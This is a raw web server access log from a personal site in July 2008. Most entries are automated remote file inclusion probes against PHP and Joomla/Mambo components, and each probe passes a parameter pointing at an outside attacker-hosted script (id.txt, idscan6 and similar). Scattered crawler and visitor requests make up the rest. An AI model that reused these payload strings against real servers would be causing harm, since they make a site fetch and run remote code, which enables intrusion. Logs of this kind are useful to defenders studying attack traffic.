74.6.22.88 - - [19/Jul/2008:11:08:25 -0700] "GET /blog/index.php/2008/04/03/hello-world/ HTTP/1.0" 200 6895 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
59.106.19.213 - - [19/Jul/2008:11:08:25 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.cepeduc.com/cepa/images/M.images/idscan3?? HTTP/1.1" 200 18458 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.78.141 - - [19/Jul/2008:11:08:33 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:11:08:38 -0700] "GET /bikes/dteel/IMG_2427s.JPG HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
202.134.105.107 - - [19/Jul/2008:11:09:06 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.134.105.107 - - [19/Jul/2008:11:09:07 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.134.105.107 - - [19/Jul/2008:11:09:07 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.134.105.107 - - [19/Jul/2008:11:09:08 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.198.5.87 - - [19/Jul/2008:11:09:15 -0700] "GET /logs/access_080207.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.blackstock.ca/alb?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:11:09:34 -0700] "GET /bikes/dteel/IMG_2428s.JPG HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
202.221.143.111 - - [19/Jul/2008:11:09:36 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.65" "www.dmulk.com"
208.38.188.128 - - [19/Jul/2008:11:09:57 -0700] "GET /logs/access_080118.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.pre.com.tw/tmp/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.38.188.128 - - [19/Jul/2008:11:09:57 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.pre.com.tw/tmp/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.38.188.128 - - [19/Jul/2008:11:09:57 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.pre.com.tw/tmp/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.38.188.128 - - [19/Jul/2008:11:09:58 -0700] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.pre.com.tw/tmp/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.221.143.111 - - [19/Jul/2008:11:10:08 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [19/Jul/2008:11:10:08 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [19/Jul/2008:11:10:14 -0700] "GET /logs/main.php?pagina=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [19/Jul/2008:11:10:15 -0700] "GET /main.php?pagina=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:11:10:33 -0700] "GET /bikes/dteel/IMG_2431s.JPG HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
89.218.85.18 - - [19/Jul/2008:11:10:36 -0700] "GET /logs/access_080329.log//claroline/phpbb/page_tail.php?includePath=http://www.fo-saverne.com/images/temp/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:11:10:40 -0700] "GET /logs/access_080528.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.13.194.38 - - [19/Jul/2008:11:11:14 -0700] "GET /logs/access_080225.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.blackstock.ca/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.221.143.111 - - [19/Jul/2008:11:11:22 -0700] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [19/Jul/2008:11:11:22 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [19/Jul/2008:11:11:24 -0700] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:11:11:27 -0700] "GET /bikes/dteel/IMG_2433s.JPG HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
72.29.87.80 - - [19/Jul/2008:11:11:43 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.beatthevegasbook.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
72.29.87.80 - - [19/Jul/2008:11:11:43 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.beatthevegasbook.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
216.193.201.57 - - [19/Jul/2008:11:11:45 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 200 18495 "-" "libwww-perl/5.75" "www.dmulk.com"
213.198.5.87 - - [19/Jul/2008:11:11:46 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.blackstock.ca/alb?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.5.87 - - [19/Jul/2008:11:11:48 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.blackstock.ca/alb?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
72.249.7.104 - - [19/Jul/2008:11:12:06 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://wiki.sertes.nl/tiki/styles/slides/check.txt%0D? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
72.249.7.104 - - [19/Jul/2008:11:12:07 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://wiki.sertes.nl/tiki/styles/slides/check.txt%0D? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:11:12:24 -0700] "GET /bikes/dteel/IMG_2435s.JPG HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
202.221.143.111 - - [19/Jul/2008:11:13:10 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [19/Jul/2008:11:13:11 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:11:13:21 -0700] "GET /bikes/dteel/IMG_2436s.JPG HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
216.193.201.57 - - [19/Jul/2008:11:13:22 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
195.70.36.107 - - [19/Jul/2008:11:14:16 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [19/Jul/2008:11:14:19 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 200 18473 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [19/Jul/2008:11:14:20 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:11:14:22 -0700] "GET /bikes/dteel/IMG_2438s.JPG HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
85.13.194.38 - - [19/Jul/2008:11:14:54 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.blackstock.ca/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.13.194.38 - - [19/Jul/2008:11:14:55 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.blackstock.ca/alb?? HTTP/1.1" 200 18489 "-" "libwww-perl/5.811" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:11:14:58 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.26.219.83 - - [19/Jul/2008:11:15:05 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.mojir.com/el/moodledata/site/read?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.26.219.83 - - [19/Jul/2008:11:15:09 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.mojir.com/el/moodledata/site/read?? HTTP/1.1" 200 18523 "-" "libwww-perl/5.805" "www.dmulk.com"
62.26.219.83 - - [19/Jul/2008:11:15:09 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.mojir.com/el/moodledata/site/read?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:11:15:20 -0700] "GET /logs/access.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:11:15:21 -0700] "GET /bikes/dteel/IMG_2451s.JPG HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:11:15:22 -0700] "GET /logs/access.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.26.219.83 - - [19/Jul/2008:11:15:33 -0700] "GET /logs/access_080313.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.mojir.com/el/moodledata/site/read?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:11:16:12 -0700] "GET /logs/access.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.246.78.141 - - [19/Jul/2008:11:16:30 -0700] "GET /logs/access_071225.log/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.78.141 - - [19/Jul/2008:11:16:30 -0700] "GET /errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.78.141 - - [19/Jul/2008:11:16:30 -0700] "GET /logs/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:11:16:39 -0700] "GET /logs/access.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:11:16:43 -0700] "GET /logs/access.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.134.105.107 - - [19/Jul/2008:11:16:47 -0700] "GET /logs/access_080313.log/index.php?pag=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.134.105.107 - - [19/Jul/2008:11:16:47 -0700] "GET /logs/access_080313.log/index.php?pag=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.134.105.107 - - [19/Jul/2008:11:16:47 -0700] "GET /logs/index.php?pag=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.134.105.107 - - [19/Jul/2008:11:16:48 -0700] "GET /logs/index.php?pag=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.151.2.149 - - [19/Jul/2008:11:16:48 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.87.80 - - [19/Jul/2008:11:16:49 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.hotlinkfiles.com/files/1605016_lfsly/id4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.87.80 - - [19/Jul/2008:11:16:49 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.hotlinkfiles.com/files/1605016_lfsly/id4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
59.151.2.149 - - [19/Jul/2008:11:16:56 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 200 18497 "-" "libwww-perl/5.79" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:11:17:04 -0700] "GET /logs/access.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:11:17:05 -0700] "GET /logs/access_080218.log/index.php?sub=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:11:17:10 -0700] "GET /logs/access.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:11:17:13 -0700] "GET /logs/access.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [19/Jul/2008:11:17:14 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.134.105.107 - - [19/Jul/2008:11:17:19 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.246.8.237 - - [19/Jul/2008:11:17:21 -0700] "GET /logs/access_080329.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.m-comp.nl/oscommerce/catalog/includes/local/fonts.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.134.105.107 - - [19/Jul/2008:11:17:22 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 200 18513 "-" "libwww-perl/5.803" "www.dmulk.com"
216.246.8.237 - - [19/Jul/2008:11:17:23 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.m-comp.nl/oscommerce/catalog/includes/local/fonts.txt? HTTP/1.1" 200 18573 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.8.237 - - [19/Jul/2008:11:17:23 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.m-comp.nl/oscommerce/catalog/includes/local/fonts.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.146.26.59 - - [19/Jul/2008:11:17:25 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0139_0.jpg HTTP/1.1" 200 344118 "http://www.vfrdiscussion.com/forum/index.php?showtopic=36984" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
222.73.48.200 - - [19/Jul/2008:11:17:28 -0700] "GET /logs/access_080321.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.146.26.59 - - [19/Jul/2008:11:17:29 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0139_0.jpg HTTP/1.1" 206 63836 "http://www.vfrdiscussion.com/forum/index.php?showtopic=36984" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
222.73.48.200 - - [19/Jul/2008:11:17:31 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 200 18489 "-" "libwww-perl/5.79" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:11:17:32 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.192.48.154 - - [19/Jul/2008:11:17:52 -0700] "GET /logs/access_080329.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.m-comp.nl/oscommerce/catalog/includes/local/fonts.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.134.105.107 - - [19/Jul/2008:11:17:54 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.192.48.154 - - [19/Jul/2008:11:17:55 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.m-comp.nl/oscommerce/catalog/includes/local/fonts.txt? HTTP/1.1" 200 18573 "-" "libwww-perl/5.79" "www.dmulk.com"
67.192.48.154 - - [19/Jul/2008:11:17:55 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.m-comp.nl/oscommerce/catalog/includes/local/fonts.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.134.105.107 - - [19/Jul/2008:11:17:58 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 200 18513 "-" "libwww-perl/5.803" "www.dmulk.com"
208.38.188.128 - - [19/Jul/2008:11:17:58 -0700] "GET /logs/access_080207.log/components/com_simpleboard/image_upload.php?sbp=http://www.pre.com.tw/tmp/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.38.188.128 - - [19/Jul/2008:11:17:58 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.pre.com.tw/tmp/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.38.188.128 - - [19/Jul/2008:11:17:58 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.pre.com.tw/tmp/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
59.125.211.84 - - [19/Jul/2008:11:18:07 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://yayang.co.uk/ml/id.txt?? HTTP/1.1" 200 18505 "-" "libwww-perl/5.79" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:11:18:18 -0700] "GET /logs/access.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.193.201.57 - - [19/Jul/2008:11:18:44 -0700] "GET /logs/access_080129.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
216.193.201.57 - - [19/Jul/2008:11:18:44 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
206.117.237.200 - - [19/Jul/2008:11:18:50 -0700] "GET /logs/access_080329.log//?path%5Bdocroot%5D=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [19/Jul/2008:11:18:50 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 200 56856 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [19/Jul/2008:11:18:52 -0700] "GET //?path%5Bdocroot%5D=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 200 18415 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:11:18:56 -0700] "GET /logs/access_071225.log/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:11:18:56 -0700] "GET /errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:11:18:57 -0700] "GET /logs/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.38.188.128 - - [19/Jul/2008:11:19:04 -0700] "GET /logs/access_071219.log/components/com_simpleboard/image_upload.php?sbp=http://www.pre.com.tw/tmp/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.246.8.237 - - [19/Jul/2008:11:19:12 -0700] "GET /logs/access.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.m-comp.nl/oscommerce/catalog/includes/local/fonts.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:11:19:16 -0700] "GET /logs/access.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.113.209.171 - - [19/Jul/2008:11:19:20 -0700] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://mobad.de/id.jpg?? HTTP/1.1" 200 18449 "-" "libwww-perl/5.803" "www.dmulk.com"
208.113.209.171 - - [19/Jul/2008:11:19:20 -0700] "GET /logs/index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://mobad.de/id.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.193.201.57 - - [19/Jul/2008:11:19:28 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 200 18515 "-" "libwww-perl/5.75" "www.dmulk.com"
206.117.237.200 - - [19/Jul/2008:11:19:33 -0700] "GET /logs/access_080207.log//?path%5Bdocroot%5D=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.218.85.18 - - [19/Jul/2008:11:19:34 -0700] "GET /index.php?option=com_acajoom&act=http://www.geocities.com/cripya/header.jpg? HTTP/1.1" 200 18449 "-" "libwww-perl/5.805" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:11:19:38 -0700] "GET /logs/access_080313.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:11:19:41 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 200 18477 "-" "libwww-perl/5.79" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:11:19:42 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.246.78.141 - - [19/Jul/2008:11:20:25 -0700] "GET /logs/access_080110.log/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.106.98.71 - - [19/Jul/2008:11:20:26 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [19/Jul/2008:11:20:26 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.8.237 - - [19/Jul/2008:11:20:27 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.m-comp.nl/oscommerce/catalog/includes/local/fonts.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.8.237 - - [19/Jul/2008:11:20:28 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.m-comp.nl/oscommerce/catalog/includes/local/fonts.txt? HTTP/1.1" 200 18573 "-" "libwww-perl/5.811" "www.dmulk.com"
69.64.80.225 - - [19/Jul/2008:11:20:29 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
